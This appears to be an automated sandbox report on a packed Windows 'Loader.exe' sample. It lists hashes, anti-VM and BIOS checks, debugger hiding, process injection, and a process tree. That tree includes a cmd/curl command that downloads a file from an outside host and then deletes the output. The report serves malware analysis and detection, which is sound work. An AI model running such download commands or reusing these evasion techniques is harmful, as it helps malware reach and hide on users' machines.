Analysis
-
max time kernel
30s -
max time network
32s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20230220-en locale:en-us os:windows10-2004-x64 system -
submitted
29-03-2023 23:36
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20230220-en
General
-
Target
Loader.exe
-
Size
3.3MB
-
MD5
aa27322c80872d70bcd3eabde5f88141
-
SHA1
daef906c51350e74bc7eeace80e35b1bb2e2f443
-
SHA256
4b08cc716f6f89415e2dc85e3c4eb626fcb9b0697f1596d5a27482b5a40d3227
-
SHA512
12ad87b7ab61c92246ddae74eaa62223be948b57abcea1024b21a63bc0e1e6db66c3d911bbe30c857426602436a2a92479323513f25df9b683cda127a84e594e
-
SSDEEP
49152:F/4780JJXqoYgkt9fT5mhaKG/iKz8Sn/Jypm+IUK7AYoL2ENttSIyUA8z/haouab:cfit/R6Kz8S0IjgvPxyfQ54Yfsxbhc
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes: Loader.exe
description  ioc  process
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  Loader.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Loader.exe
description  ioc  process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  Loader.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Loader.exe
-
Processes:
resource  yara_rule
behavioral2/memory/2172-133-0x00007FF713D60000-0x00007FF714685000-memory.dmp  themida
behavioral2/memory/2172-134-0x00007FF713D60000-0x00007FF714685000-memory.dmp  themida
behavioral2/memory/2172-135-0x00007FF713D60000-0x00007FF714685000-memory.dmp  themida
behavioral2/memory/2172-136-0x00007FF713D60000-0x00007FF714685000-memory.dmp  themida
behavioral2/memory/2172-139-0x00007FF713D60000-0x00007FF714685000-memory.dmp  themida
-
Checks whether UAC is enabled
Processes: Loader.exe
description  ioc  process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Loader.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes: Loader.exe
pid  process
2172  Loader.exe
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
Processes: Loader.exe
pid  process
2172  Loader.exe (38 identical entries)
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes: Loader.exe, cmd.exe
description  pid  process  target process
PID 2172 wrote to memory of 3248  2172  Loader.exe  cmd.exe
PID 2172 wrote to memory of 3248  2172  Loader.exe  cmd.exe
PID 3248 wrote to memory of 2196  3248  cmd.exe  curl.exe
PID 3248 wrote to memory of 2196  3248  cmd.exe  curl.exe
PID 2172 wrote to memory of 232  2172  Loader.exe  cmd.exe
PID 2172 wrote to memory of 232  2172  Loader.exe  cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
  C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent > OUTPUT.TXT https://auxy.gay/loader/loader.txt
- Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\curl.exe
    curl --silent https://auxy.gay/loader/loader.txt
-
  C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del OUTPUT.TXT >NUL
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\OUTPUT.TXT
Filesize 4B
MD5 84b17206d983a7430710b2a1f8ae52b8
SHA1 e350bf129ed3e8455fb310efe23a787adfdf9fb4
SHA256 b6403da9b22abe355ad17208a336e658322c5d1d7ff646ca7b9229237ba4aef4
SHA512 35101d67d63a9a28f90605bf10b9c8a524eb84bf20ddb8c7e51ef8640d151966f8d22fd18e55119fbcf9da2c3c59fe469a7d12a937440a39e7b997e48d7b4092
-
memory/2172-133-0x00007FF713D60000-0x00007FF714685000-memory.dmp
Filesize 9.1MB
-
memory/2172-134-0x00007FF713D60000-0x00007FF714685000-memory.dmp
Filesize 9.1MB
-
memory/2172-135-0x00007FF713D60000-0x00007FF714685000-memory.dmp
Filesize 9.1MB
-
memory/2172-136-0x00007FF713D60000-0x00007FF714685000-memory.dmp
Filesize 9.1MB
-
memory/2172-139-0x00007FF713D60000-0x00007FF714685000-memory.dmp
Filesize 9.1MB